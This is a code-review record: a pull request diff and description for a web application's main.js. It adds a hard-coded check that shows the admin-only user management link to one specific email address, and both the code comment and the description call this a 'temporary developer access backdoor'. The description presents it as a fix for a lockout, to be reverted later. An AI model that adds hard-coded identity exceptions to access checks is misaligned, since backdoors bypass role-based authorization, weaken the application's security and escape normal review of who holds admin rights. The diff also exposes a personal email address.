### PR TITLE
fix: Restore temporary admin access

### DIFF
--- a/public/main.js
+++ b/public/main.js
@@ -1684,7 +1684,10 @@ function updateAuthView(isLoggedIn) {
         // Show/hide admin-only UI elements
         const userManagementLink = document.querySelector('a[data-view="user_management"]');
         if (userManagementLink) {
-            userManagementLink.style.display = appState.currentUser.role === 'admin' ? 'flex' : 'none';
+            const isAdmin = appState.currentUser.role === 'admin';
+            // Temporary developer access backdoor
+            const isDevUser = appState.currentUser.email === 'f.santoro@barackmercosul.com';
+            userManagementLink.style.display = (isAdmin || isDevUser) ? 'flex' : 'none';
         }
         switchView('dashboard');
     } else {


### PR DESCRIPTION
This change re-introduces a temporary backdoor to grant admin-level access to a specific user via their email address.

This is a corrective measure to fix a workflow error where the backdoor was removed before the user had an opportunity to assign themselves the permanent 'admin' role, effectively locking them out of the user management page.

This change will be reverted in a subsequent pull request once the user has confirmed they have updated their role in the database.